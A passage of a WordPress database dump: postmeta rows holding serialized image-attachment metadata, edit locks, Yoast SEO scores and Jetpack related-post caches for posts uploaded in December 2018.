(10340, 4696, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/12/46488045_711196739256517_1628095443328040960_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46488045_711196739256517_1628095443328040960_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46488045_711196739256517_1628095443328040960_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46488045_711196739256517_1628095443328040960_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46488045_711196739256517_1628095443328040960_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46488045_711196739256517_1628095443328040960_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10343, 4698, '_edit_lock', '1543820829:3'),
(10344, 4698, '_edit_last', '3'),
(10345, 4699, '_wp_attached_file', '2018/12/46508887_711316772577847_7610738454317498368_o.jpg'),
(10346, 4699, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:58:\"2018/12/46508887_711316772577847_7610738454317498368_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46508887_711316772577847_7610738454317498368_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46508887_711316772577847_7610738454317498368_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46508887_711316772577847_7610738454317498368_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46508887_711316772577847_7610738454317498368_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46508887_711316772577847_7610738454317498368_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10347, 4698, '_thumbnail_id', '4699'),
(10351, 4698, '_hide_featured', NULL),
(10352, 4698, '_yoast_wpseo_content_score', '30'),
(10353, 4698, '_yoast_wpseo_primary_category', '31'),
(10354, 4698, '_wpas_done_all', '1'),
(10355, 4701, '_edit_lock', '1543811021:3'),
(10356, 4701, '_edit_last', '3'),
(10357, 4702, '_wp_attached_file', '2018/12/46743464_711761939199997_3346610986302832640_o.jpg'),
(10358, 4702, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:58:\"2018/12/46743464_711761939199997_3346610986302832640_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46743464_711761939199997_3346610986302832640_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46743464_711761939199997_3346610986302832640_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46743464_711761939199997_3346610986302832640_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46743464_711761939199997_3346610986302832640_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46743464_711761939199997_3346610986302832640_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10359, 4701, '_thumbnail_id', '4702'),
(10363, 4701, '_hide_featured', NULL),
(10364, 4701, '_yoast_wpseo_content_score', '30'),
(10365, 4701, '_yoast_wpseo_primary_category', '31'),
(10366, 4701, '_wpas_done_all', '1'),
(10367, 4704, '_edit_lock', '1543817853:3'),
(10368, 4704, '_edit_last', '3'),
(10369, 4687, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575422709;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6322;}i:1;a:1:{s:2:\"id\";i:5194;}i:2;a:1:{s:2:\"id\";i:6054;}}}}'),
(10370, 4705, '_wp_attached_file', '2018/12/46513438_712237995819058_3854682154013294592_o.jpg'),
(10371, 4705, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1773;s:6:\"height\";i:1330;s:4:\"file\";s:58:\"2018/12/46513438_712237995819058_3854682154013294592_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46513438_712237995819058_3854682154013294592_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46513438_712237995819058_3854682154013294592_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46513438_712237995819058_3854682154013294592_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46513438_712237995819058_3854682154013294592_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46513438_712237995819058_3854682154013294592_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10372, 4704, '_thumbnail_id', '4705'),
(10376, 4704, '_hide_featured', NULL),
(10377, 4704, '_yoast_wpseo_content_score', '30'),
(10378, 4704, '_yoast_wpseo_primary_category', '31'),
(10379, 4704, '_wpas_done_all', '1'),
(10380, 4698, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575722443;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4958;}i:1;a:1:{s:2:\"id\";i:4701;}i:2;a:1:{s:2:\"id\";i:4875;}}}}'),
(10383, 4708, '_edit_lock', '1543818177:3'),
(10384, 4708, '_edit_last', '3'),
(10385, 4709, '_wp_attached_file', '2018/12/46731085_714000298976161_5902792134368428032_o.jpg'),
(10386, 4709, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:890;s:6:\"height\";i:1188;s:4:\"file\";s:58:\"2018/12/46731085_714000298976161_5902792134368428032_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46731085_714000298976161_5902792134368428032_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46731085_714000298976161_5902792134368428032_o-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"46731085_714000298976161_5902792134368428032_o-768x1025.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46731085_714000298976161_5902792134368428032_o-767x1024.jpg\";s:5:\"width\";i:767;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46731085_714000298976161_5902792134368428032_o-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10387, 4708, '_thumbnail_id', '4709'),
(10391, 4708, '_hide_featured', NULL),
(10392, 4708, '_yoast_wpseo_content_score', '30'),
(10393, 4708, '_yoast_wpseo_primary_category', '31'),
(10394, 4708, '_wpas_done_all', '1'),
(10395, 4711, '_edit_lock', '1543818273:3'),
(10396, 4711, '_edit_last', '3'),
(10397, 4712, '_wp_attached_file', '2018/12/3-12-2561-13-27-50.jpg'),
(10398, 4712, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:461;s:6:\"height\";i:619;s:4:\"file\";s:30:\"2018/12/3-12-2561-13-27-50.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"3-12-2561-13-27-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"3-12-2561-13-27-50-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"3-12-2561-13-27-50-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10399, 4713, '_wp_attached_file', '2018/12/46524261_714053405637517_1678333912012554240_o.jpg'),
(10400, 4713, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/12/46524261_714053405637517_1678333912012554240_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46524261_714053405637517_1678333912012554240_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46524261_714053405637517_1678333912012554240_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46524261_714053405637517_1678333912012554240_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46524261_714053405637517_1678333912012554240_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46524261_714053405637517_1678333912012554240_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10401, 4711, '_thumbnail_id', '4713'),
(10405, 4711, '_hide_featured', NULL),
(10406, 4711, '_yoast_wpseo_content_score', '30'),
(10407, 4711, '_yoast_wpseo_primary_category', '31'),
(10408, 4711, '_wpas_done_all', '1'),
(10409, 4715, '_edit_lock', '1543818509:3'),
(10410, 4715, '_edit_last', '3'),
(10411, 4716, '_wp_attached_file', '2018/12/47052900_714528652256659_4488394279206518784_o-1.jpg'),
(10412, 4716, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1364;s:4:\"file\";s:60:\"2018/12/47052900_714528652256659_4488394279206518784_o-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"47052900_714528652256659_4488394279206518784_o-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"47052900_714528652256659_4488394279206518784_o-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"47052900_714528652256659_4488394279206518784_o-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"47052900_714528652256659_4488394279206518784_o-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"47052900_714528652256659_4488394279206518784_o-1-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10413, 4715, '_thumbnail_id', '4716'),
(10417, 4715, '_hide_featured', NULL),
(10418, 4715, '_yoast_wpseo_content_score', '30'),
(10419, 4715, '_yoast_wpseo_primary_category', '31'),
(10420, 4715, '_wpas_done_all', '1'),
(10421, 4718, '_edit_lock', '1543820273:3'),
(10424, 4718, '_edit_last', '3'),
(10425, 4719, '_wp_attached_file', '2018/12/3-12-2561-13-59-50.jpg'),
(10426, 4719, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:453;s:6:\"height\";i:615;s:4:\"file\";s:30:\"2018/12/3-12-2561-13-59-50.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"3-12-2561-13-59-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"3-12-2561-13-59-50-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"3-12-2561-13-59-50-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10427, 4720, '_wp_attached_file', '2018/12/46965697_715006235542234_8544488684047564800_o.jpg'),
(10428, 4720, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1188;s:6:\"height\";i:890;s:4:\"file\";s:58:\"2018/12/46965697_715006235542234_8544488684047564800_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46965697_715006235542234_8544488684047564800_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46965697_715006235542234_8544488684047564800_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46965697_715006235542234_8544488684047564800_o-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46965697_715006235542234_8544488684047564800_o-1024x767.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:767;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46965697_715006235542234_8544488684047564800_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10429, 4718, '_thumbnail_id', '4720'),
(10433, 4718, '_hide_featured', NULL),
(10434, 4718, '_yoast_wpseo_content_score', '30'),
(10435, 4718, '_yoast_wpseo_primary_category', '31'),
(10436, 4718, '_wpas_done_all', '1'),
(10437, 4722, '_edit_lock', '1543820768:3'),
(10438, 4722, '_edit_last', '3'),
(10439, 4723, '_wp_attached_file', '2018/12/46863358_715021292207395_4518044663243866112_o.jpg'),
(10440, 4723, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/12/46863358_715021292207395_4518044663243866112_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"46863358_715021292207395_4518044663243866112_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"46863358_715021292207395_4518044663243866112_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"46863358_715021292207395_4518044663243866112_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"46863358_715021292207395_4518044663243866112_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"46863358_715021292207395_4518044663243866112_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10441, 4722, '_thumbnail_id', '4723'),
(10445, 4722, '_hide_featured', NULL),
(10446, 4722, '_yoast_wpseo_content_score', '30'),
(10447, 4722, '_yoast_wpseo_primary_category', '31'),
(10448, 4722, '_wpas_done_all', '1'),
(10449, 4722, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575704115;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4746;}i:1;a:1:{s:2:\"id\";i:4715;}i:2;a:1:{s:2:\"id\";i:4726;}}}}'),
(10450, 4718, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575642261;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4964;}i:1;a:1:{s:2:\"id\";i:3968;}i:2;a:1:{s:2:\"id\";i:3988;}}}}'),
(10451, 4715, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575683894;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5900;}i:1;a:1:{s:2:\"id\";i:4991;}i:2;a:1:{s:2:\"id\";i:4415;}}}}'),
(10452, 4711, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575463034;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5769;}i:1;a:1:{s:2:\"id\";i:4746;}i:2;a:1:{s:2:\"id\";i:4732;}}}}'),
(10453, 4704, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575703528;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4632;}i:1;a:1:{s:2:\"id\";i:4875;}i:2;a:1:{s:2:\"id\";i:4701;}}}}'),
(10454, 4708, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575570639;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4638;}i:1;a:1:{s:2:\"id\";i:4869;}i:2;a:1:{s:2:\"id\";i:5582;}}}}'),
(10455, 4726, '_edit_lock', '1543905781:3'),
(10456, 4726, '_edit_last', '3'),
(10457, 4727, '_wp_attached_file', '2018/12/4-12-2561-9-33-20.jpg'),
(10458, 4727, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:456;s:6:\"height\";i:663;s:4:\"file\";s:29:\"2018/12/4-12-2561-9-33-20.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-12-2561-9-33-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"4-12-2561-9-33-20-206x300.jpg\";s:5:\"width\";i:206;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-12-2561-9-33-20-206x300.jpg\";s:5:\"width\";i:206;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10459, 4728, '_wp_attached_file', '2018/12/47105650_715685885474269_3262351171133636608_o.jpg'),
(10460, 4728, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/12/47105650_715685885474269_3262351171133636608_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47105650_715685885474269_3262351171133636608_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47105650_715685885474269_3262351171133636608_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47105650_715685885474269_3262351171133636608_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47105650_715685885474269_3262351171133636608_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47105650_715685885474269_3262351171133636608_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
